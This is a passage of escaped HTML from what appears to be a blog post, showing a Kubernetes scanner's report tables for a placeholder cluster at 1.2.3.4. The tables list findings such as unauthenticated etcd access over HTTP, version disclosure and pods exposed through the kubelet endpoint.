\u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| operations on the\u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| cluster.\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E+----------------------+---------------------+----------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| API Server\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| 1.2.3.4:443\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| The API server is in |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| charge of all\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| operations on the\u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| cluster.\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E+----------------------+---------------------+----------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003EVulnerabilities\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+---------------------+----------------------+----------------------+----------------------+----------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E| LOCATION\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | CATEGORY\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| VULNERABILITY\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | DESCRIPTION\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | EVIDENCE\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+---------------------+----------------------+----------------------+----------------------+----------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E| 1.2.3.4:2379\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | Unauthenticated\u0026nbsp; \u0026nbsp; \u0026nbsp; | Etcd is accessible\u0026nbsp; \u0026nbsp;| Etcd is accessible\u0026nbsp; \u0026nbsp;| {\"etcdserver\":\"2.3.8 |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| Access\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| using insecure\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| using HTTP (without\u0026nbsp; | \",\"etcdcluster\":\"2.3 |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | connection (HTTP)\u0026nbsp; \u0026nbsp; | authorization and\u0026nbsp; \u0026nbsp; | ...\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | authentication), it\u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | would allow a\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | potential attacker\u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | to\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; gain access to\u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | the etcd\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+---------------------+----------------------+----------------------+----------------------+----------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E| 1.2.3.4:2379\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | Information\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | Etcd Remote version\u0026nbsp; | Remote version\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| {\"etcdserver\":\"2.3.8 |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| Disclosure\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| disclosure\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| disclosure might\u0026nbsp; \u0026nbsp; \u0026nbsp;| \",\"etcdcluster\":\"2.3 |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | give an attacker a\u0026nbsp; \u0026nbsp;| ...\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | valuable data to\u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | attack a cluster\u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+---------------------+----------------------+----------------------+----------------------+----------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E| 1.2.3.4:10255\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| Information\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | K8s Version\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | The kubernetes\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| v1.5.6-rc17\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| Disclosure\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| Disclosure\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| version could be\u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | obtained from logs\u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | in the \/metrics\u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | endpoint\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+---------------------+----------------------+----------------------+----------------------+----------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E| 1.2.3.4:10255\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| Information\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | Exposed Pods\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| An attacker could\u0026nbsp; \u0026nbsp; | count: 68\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| Disclosure\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | view sensitive\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | information about\u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | pods that are bound\u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | to a Node using the\u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | \/pods endpoint\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier 